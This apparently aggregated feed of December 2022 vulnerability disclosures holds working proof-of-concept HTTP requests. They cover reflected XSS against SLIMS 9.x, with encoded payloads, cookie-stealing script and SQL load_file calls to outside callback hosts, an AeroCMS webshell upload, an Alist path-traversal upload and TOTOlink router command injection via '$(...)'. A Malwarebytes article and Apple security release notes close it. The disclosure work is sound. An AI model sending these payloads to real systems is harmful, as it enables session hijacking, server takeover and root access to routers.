Senayan Library Management System version 9.2.1 suffers from a cross site scripting vulnerability.

    ## Title: Senayan Library Management System v9.2.1 a.k.a SLIMS 9XSS-Reflected - inserting gif - redirect to outside HTTPS server## Author: nu11secur1ty## Date: 12.20.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/download/v9.2.1/slims9_bulian-9.2.1.zip## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.1## Description:The value of manual insertion `point 3` is copied into the HTMLdocument as plain text between tags.The payload t8xqv<script>alert(1)</script>uou2q was submitted in themanual insertion `point 3`.This input was echoed unmodified in the application's response.The attacker can trick the already authenticated users to visit anvery dangerous web page ot malicious javascript exploit.## STATUS: HIGH Vulnerability[+] Payloads:```GETGET /slims9_bulian-9.2.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%6e%75%31%31%73%65%63%75%72%31%74%79%2e%63%6f%6d%2f%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%63%64%6e%35%2d%63%61%70%72%69%6f%66%69%6c%65%73%2e%6e%65%74%64%6e%61%2d%73%73%6c%2e%63%6f%6d%2f%77%70%2d%63%6f%6e%74%65%6e%74%2f%75%70%6c%6f%61%64%73%2f%32%30%31%37%2f%30%37%2f%49%4d%47%5f%30%30%36%38%2e%67%69%66%22%3e%0a%0a&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id%5c%5cwtf%27))%2b%27%27%2b(select%20load_file(%27%5c%5c%5c%5cazditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id%5c%5cdzd%27))%2b%27HTTP/1.1Host: pwnedhost.comCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=o6o88hktpej7qdtu621h58q16q; admin_logged_in=1Connection: closeContent-Length: 2```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.1)## Proof and Exploit:[href](https://streamable.com/i20ipf)## Time spent`01:35:00`

Senayan Library Management System 9.2.1 Cross Site Scripting

Senayan Library Management System version 9.2.0 suffers from a cross site scripting vulnerability.

    ## Title: Senayan Library Management System v9.2.0 a.k.a SLIMS 9 XSS-Reflected - inserting gif - redirect to outside HTTPS server## Author: nu11secur1ty## Date: 12.19.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.2.0## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.0## Description:The value of manual insertion `point 3` is copied into the HTMLdocument as plain text between tags.The payload t8xqv<script>alert(1)</script>uou2q was submitted in themanual insertion `point 3`.This input was echoed unmodified in the application's response.The attacker can trick the already authenticated users to visit anvery dangerous web page ot malicious javascript exploit.## STATUS: HIGH Vulnerability[+] Payloads:```GETGET /slims9_bulian-9.2.0/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%62%62%62%62%27%2b%28%73%65%6c%65%63%74%20%6c%6f%61%64%5f%66%69%6c%65%28%27%5c%5c%5c%5c%37%31%36%67%62%31%63%66%65%39%67%6b%6a%61%34%7a%64%6a%34%35%71%78%78%39%32%30%38%76%77%6c%6b%63%6e%30%65%6e%36%62%76%2e%73%6c%69%6d%73%2e%77%65%62%2e%69%64%5c%5c%6e%62%71%27%29%29%2b%27%74%38%78%71%76%3c%64%69%76%3e%3c%69%6d%61%67%65%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%67%69%70%68%79%2e%63%6f%6d%2f%6d%65%64%69%61%2f%62%54%42%79%75%74%61%6d%4a%53%6a%68%53%2f%67%69%70%68%79%2e%67%69%66%20%6f%6e%6c%6f%61%64%73%74%61%72%74%3d%61%6c%65%72%74%28%31%33%33%37%29%3e%68%65%6c%6c%6f%20%66%72%6f%6d%20%6e%75%31%31%73%65%63%75%72%31%74%79%3c%2f%64%69%76%3e%3c%2f%73%63%72%69%70%74%3e%75%6f%75%32%0a&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id%5c%5cwtf%27))%2b%27HTTP/1.1Host: pwnedhost.comCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=i6ml8c8i4dmi37vtcpnnf9jhm9; admin_logged_in=1Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.0)## Proof and Exploit:[href](https://streamable.com/5smxxm)## Time spent`02:35:00`

Senayan Library Management System 9.2.0 Cross Site Scripting

Senayan Library Management System version 9.1.1 suffers from a cross site scripting vulnerability.

    ## Title: Senayan Library Management System v9.1.1 a.k.a SLIMS 9 XSS-Reflected - PHPSESSID Hijacking + inserting webp image## Author: nu11secur1ty## Date: 12.17.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.1.1## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.1## Description:The value of the `class` request parameter is copied into the HTMLdocument as plain text between tags.The payload ytrrh<script>alert(1)</script>z3nj2 was submitted in theclass parameter. This input was echoed unmodified in the application'sresponse.The attacker can trick some authenticated user to visit his page andgive to him very sensitive information about the system.## STATUS: HIGH Vulnerability[+] Payloads:0.0```GETGET /slims9_bulian-9.1.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=nu11secur1ty<script>alert(document.cookie)</script>&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.oastify.com%5c%5cwtf%27))%2b%27HTTP/1.1Host: pwnedhost.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=v37jtjmmhl46f8tge63h37nin1; admin_logged_in=1Connection: close```0.1```GETGET /slims9_bulian-9.1.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%3c%64%69%76%3e%3c%69%6d%61%67%65%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%72%61%77%2e%67%69%74%68%75%62%75%73%65%72%63%6f%6e%74%65%6e%74%2e%63%6f%6d%2f%6e%75%31%31%73%65%63%75%72%31%74%79%2f%58%53%53%69%67%68%74%2f%6d%61%73%74%65%72%2f%58%53%53%2d%69%6d%61%67%65%2f%69%6d%61%67%65%2f%6b%6f%73%74%61%61%6b%61%74%69%6c%2e%77%65%62%70%20%6f%6e%6c%6f%61%64%73%74%61%72%74%3d%61%6c%65%72%74%28%31%33%33%37%29%3e%68%65%6c%6c%6f%20%66%72%6f%6d%20%6e%75%31%31%73%65%63%75%72%31%74%79%3c%2f%64%69%76%3e&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.oastify.com%5c%5cwtf%27))%2b%27HTTP/1.1Host: pwnedhost.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=v37jtjmmhl46f8tge63h37nin1; admin_logged_in=1Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.1)## Proof and Exploit:[href](https://streamable.com/ibdulr)## Time spent`01:30:00`

Senayan Library Management System 9.1.1 Cross Site Scripting

In AeroCms v0.0.1, there is an arbitrary file upload vulnerability at /admin/posts.php?source=edit_post , through which we can upload webshell and control the web server.

*   Description

In AeroCms v0.0.1, an arbitrary file upload vulnerability at /admin/posts.php?source=edit\_post , through which we can upload webshell and control the web server.

*   Step to Reproduct

1.  Login to **admin panel** -> **Posts** -> **View All Posts** -> **Edit**  
    
2.  when jump to the post edit page, and you can see that the function of uploading pictures exists. upload malicious file phpinfo.php  
    
3.  When upload success access '/images/phpinfo.php', the file was successfully uploaded and executed  
    

*   Vulnerable Code

No file checking before uploading in **edit\_post.php** file  

*   POC

\`POST /AeroCMS/admin/posts.php?source=edit\_post&p\_id=3 HTTP/1.1  
Host: 192.168.111.169  
Content-Length: 991  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://192.168.111.169  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryi7wHcLADqqvNM4nO  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://192.168.111.169/AeroCMS/admin/posts.php?source=edit\_post&p\_id=3  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: PHPSESSID=2m17ikpogrvubj8l2687hc3n45  
Connection: close

\------WebKitFormBoundaryi7wHcLADqqvNM4nO  
Content-Disposition: form-data; name="post\_title"

mysql  
\------WebKitFormBoundaryi7wHcLADqqvNM4nO  
Content-Disposition: form-data; name="post\_category\_id"

1  
\------WebKitFormBoundaryi7wHcLADqqvNM4nO  
Content-Disposition: form-data; name="post\_user"

admin  
\------WebKitFormBoundaryi7wHcLADqqvNM4nO  
Content-Disposition: form-data; name="post\_status"

draft  
\------WebKitFormBoundaryi7wHcLADqqvNM4nO  
Content-Disposition: form-data; name="image"; filename="phpinfo.php"  
Content-Type: application/octet-stream

\------WebKitFormBoundaryi7wHcLADqqvNM4nO  
Content-Disposition: form-data; name="post\_tags"

mysql, database  
\------WebKitFormBoundaryi7wHcLADqqvNM4nO  
Content-Disposition: form-data; name="post\_content"

AeroCMS is created with mysql database.

\------WebKitFormBoundaryi7wHcLADqqvNM4nO Content-Disposition: form-data; name="update\_post"

Edit Post  
\------WebKitFormBoundaryi7wHcLADqqvNM4nO--  
\`

CVE-2022-46135: AeroCMS v0.0.1 Arbitrary File upload vulnerability  · Issue #5 · MegaTKC/AeroCMS

Categories: Exploits and vulnerabilities
Categories: News
Tags: Apple

Tags:  iOS 16.1.2

Tags:  Safari 16.2

Tags:  CVE-2022-42856

Tags:  type confusion

Apple has released new security content for iOS 16.1.2 and Safari 16.2. to fix a zero-day security vulnerability that was actively exploited



(Read more...)




The post Update now! Apple patches active exploit vulnerability for iPhones appeared first on Malwarebytes Labs.

Posted: December 16, 2022 by

Apple has released new security content for iOS 16.1.2 and Safari 16.2. Normally we would say that Apple pushed out updates, but in this mysterious case the advisory is about an iPhone software update Apple released two weeks ago. As it turns out, to fix a zero-day security vulnerability that was actively exploited.

**Mitigation**

The updates should all have reached you in your regular update routines, but it doesn't hurt to check if your device is at the latest update level.

How to update your iPhone or iPad.

How to update macOS on Mac.

If you fear your Mac has been infected, try out Malwarebytes for Mac. Or Malwarebytes for iOS for your Apple devices.

Since the vulnerability we’ll discuss below is already being exploited, it's important that you update your devices as soon as you can.

**CVE-2022-42856**

Apple revealed that it is aware that threat actors are actively exploiting the vulnerability listed as CVE-2022-42856. The bug was found in WebKit which is Apple’s web rendering engine. In other words, WebKit is the browser engine that powers Safari and other apps. So, it’s no surprise that you will find the same CVE number in the Safari security advisory, along with a list of others.

Apple says the impact of the vulnerability is that processing maliciously crafted web content may lead to arbitrary code execution. The underlying issue was what is called a "type confusion" issue, which was addressed with improved state handling.

Type confusion vulnerabilities are programming flaws that happen when a piece of code doesn’t verify the type of object that is passed to it before using it. Type confusion can allow an attacker to feed function pointers or data into the wrong piece of code. In some cases, this can lead to code execution.

Another clue was given when Apple revealed that security researchers at Google’s Threat Analysis Group, which investigates nation state-backed spyware, hacking, and cyberattacks, discovered and reported the WebKit bug. That might give you an idea about who was using the exploit in the wild.

**Version confusion**

What remains a mystery is why Apple specifically stated that this issue may have been actively exploited against versions of iOS released before iOS 15.1.

We asked our resident Apple expert Thomas Reed why, then, did iOS 16 users get an update and iOS 15 users didn’t?

He pointed out the fact that Apple recently documented that security fixes may only apply to the latest system, and may not be back-ported to older systems. This has always been the case, but it wasn't documented, leaving users guessing about what was going on.

> “Still, Apple has been known to back-port fixes when they're aware of active attacks on an older system, so I doubt it's just a matter of falling back on a disclaimer. That suggests to me that there's some difficulty involved. I don't know exactly what changed in WebKit between iOS 15 and 16, but there were definitely a lot of Safari-related changes in iOS 16, so it's entirely possible there's some kind of architectural change standing in the way of back-porting.”

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

**RELATED ARTICLES**

Update now! Apple patches active exploit vulnerability for iPhones

Alist v3.4.0 is vulnerable to Directory Traversal,

**Please make sure of the following things**

*   I have read the documentation.
*   I'm sure there are no duplicate issues or discussions.
*   I'm sure it's due to alist and not something else(such as Dependencies or Operational).
*   I'm sure I'm using the latest version

**Alist Version / Alist 版本**

v3.4.0（It seems like this problem still exists in version 3.5.1）

**Driver used / 使用的存储驱动**

Local

**Describe the bug / 问题描述**

*   A user with only file upload permission can bypass the base path restriction by using '... /' to bypass the base path restriction and upload files to an arbitrary path
    
*   I created a user 'test' with file upload permission only and set its base path to '/test'
    

*   My file directory structure is as follows

*   Login as 'test', found out that I am already in '/test'

*   And try to upload a file, catch the package and modified the 'File-path' parameter with '../'

*   Send the package, and login as 'admin' to check out the '/testPasswd'. Will find out that the file has been uploaded successfully.

**Reproduction / 复现链接**

Package:  
PUT /api/fs/put HTTP/1.1  
Host: 192.168.31.148:52000  
Content-Length: 30530  
Accept: application/json, text/plain, _/_  
As-Task: false  
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QiLCJleHAiOjE2NjkyOTQ4NTMsIm5iZiI6MTY2OTEyMjA1MywiaWF0IjoxNjY5MTIyMDUzfQ.DwnVRyCGUZ0Cx2B7s6kCqvrg\_-rzQ7hf5tbbsy4RSVc  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36  
**File-Path: ..%2ftestPasswd%2ftestDirectoryTraversal**  
Content-Type: application/octet-stream  
Origin: http://192.168.31.148:52000  
Referer: http://192.168.31.148:52000/  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Connection: close

�PNG  
�

**Logs / 日志**

CVE-2022-45969: Directory traversal file upload vulnerability · Issue #2449 · alist-org/alist

TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the wscDisabled parameter in the setting/setWiFiSignalCfg function.

**TOTOlink A7100RU Command injection vulnerability****Overview**

*   Manufacturer's website information：http://totolink.net/
*   Firmware download address ： http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**2.Vulnerability details**

The program passes the content obtained by the wscdisabled parameter to the V3 parameter, then assigns V3 to V6, and finally brings V6 to UCI\_ Set\_ In str function

Format the A4 matched content into V11 through snprintf function, and then bring V11 into cstesystem function

The function directly brings user input into the execv function, which has a command injection vulnerability

**3.Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V7.4cu.2313\_B20191024
2.  Attack with the following overflow POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 79
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/adm/status.asp?timestamp=1647872753309
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647872744:2
    Connection: close
    
    {"topicurl":"setting/setWiFiSignalCfg",
    "wscDisabled":"1$(ls>/tmp/123;)"}
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-46631: IOT_vuln/TOTOLink/A7100RU/6 at main · EPhaha/IOT_vuln

TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the wscDisabled parameter in the setting/setWiFiWpsCfg function.

**TOTOlink A7100RU Command injection vulnerability****Overview**

*   Manufacturer's website information：http://totolink.net/
*   Firmware download address ： http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**2.Vulnerability details**

The program passes the content obtained by the wscdisabled parameter to the V5 parameter, and then brings V5 into UCI\_ Set\_ STR function

Format the A4 matched content into V11 through snprintf function, and then bring V11 into cstesystem function

The function directly brings user input into the execv function, which has a command injection vulnerability

**3.Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V7.4cu.2313\_B20191024
2.  Attack with the following overflow POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 79
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/adm/status.asp?timestamp=1647872753309
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647872744:2
    Connection: close
    
    {"topicurl":"setting/setWiFiWpsCfg",
    "wscDisabled":"1$(ls>/tmp/123;)"}
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-46634: IOT_vuln/TOTOLink/A7100RU/7 at main · EPhaha/IOT_vuln

A memory corruption issue was addressed with improved input validation. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted web content may lead to arbitrary code execution.

Released December 13, 2022

**AppleAVD**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Parsing a maliciously crafted video file may lead to kernel code execution

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-46694: Andrey Labunets and Nikita Tarakanov

**AVEVideoEncoder**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A logic issue was addressed with improved checks.

CVE-2022-42848: ABC Research s.r.o

**File System**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to break out of its sandbox

Description: This issue was addressed with improved checks.

CVE-2022-42861: pattern-f (@pattern\_F\_) of Ant Security Light-Year Lab

**Graphics Driver**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Parsing a maliciously crafted video file may lead to unexpected system termination

Description: The issue was addressed with improved memory handling.

CVE-2022-42846: Willy R. Vasquez of The University of Texas at Austin

**IOHIDFamily**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with improved state handling.

CVE-2022-42864: Tommy Muir (@Muirey03)

**iTunes Store**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: An issue existed in the parsing of URLs. This issue was addressed with improved input validation.

CVE-2022-42837: Weijia Dai (@dwj1210) of Momo Security

**Kernel**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with additional validation.

CVE-2022-46689: Ian Beer of Google Project Zero

**libxml2**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: An integer overflow was addressed through improved input validation.

CVE-2022-40303: Maddie Stone of Google Project Zero

**libxml2**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved checks.

CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project Zero

**ppp**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-42840: an anonymous researcher

**Preferences**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to use arbitrary entitlements

Description: A logic issue was addressed with improved state management.

CVE-2022-42855: Ivan Fratric of Google Project Zero

**Safari**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Visiting a website that frames malicious content may lead to UI spoofing

Description: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.

CVE-2022-46695: KirtiKumar Anandrao Ramchandani

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory consumption issue was addressed with improved memory handling.

WebKit Bugzilla: 245466  
CVE-2022-46691: an anonymous researcher

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may result in the disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2022-42852: hazbinhotel working with Trend Micro Zero Day Initiative

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may bypass Same Origin Policy

Description: A logic issue was addressed with improved state management.

WebKit Bugzilla: 246783  
CVE-2022-46692: KirtiKumar Anandrao Ramchandani

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

WebKit Bugzilla: 247562  
CVE-2022-46700: Samuel Groß of Google V8 Security

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.1.

Description: A type confusion issue was addressed with improved state handling.

WebKit Bugzilla: 248266  
CVE-2022-42856: Clément Lecigne of Google's Threat Analysis Group

CVE-2022-46700: About the security content of iOS 15.7.2 and iPadOS 15.7.2

The issue was addressed with improved memory handling. This issue is fixed in iOS 16.2 and iPadOS 16.2. An app may be able to disclose kernel memory.

Released December 13, 2022

**Accounts**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A user may be able to view sensitive user information

Description: This issue was addressed with improved data protection.

CVE-2022-42843: Mickey Jin (@patch1t)

**AppleAVD**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Parsing a maliciously crafted video file may lead to kernel code execution

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-46694: Andrey Labunets and Nikita Tarakanov

**AppleMobileFileIntegrity**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed by enabling hardened runtime.

CVE-2022-42865: Wojciech Reguła (@\_r3ggi) of SecuRing

**AVEVideoEncoder**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A logic issue was addressed with improved checks.

CVE-2022-42848: ABC Research s.r.o

**CoreServices**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to bypass Privacy preferences

Description: Multiple issues were addressed by removing the vulnerable code.

CVE-2022-42859: Mickey Jin (@patch1t), Csaba Fitzl (@theevilbit) of Offensive Security

**GPU Drivers**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2022-46702: Xia0o0o0o of W4terDr0p, Sun Yat-sen University

**Graphics Driver**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-42850: Willy R. Vasquez of The University of Texas at Austin

**Graphics Driver**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Parsing a maliciously crafted video file may lead to unexpected system termination

Description: The issue was addressed with improved memory handling.

CVE-2022-42846: Willy R. Vasquez of The University of Texas at Austin

**ImageIO**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing a maliciously crafted file may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-46693: Mickey Jin (@patch1t)

**ImageIO**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Parsing a maliciously crafted TIFF file may lead to disclosure of user information

Description: The issue was addressed with improved memory handling.

CVE-2022-42851: Mickey Jin (@patch1t)

**IOHIDFamily**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

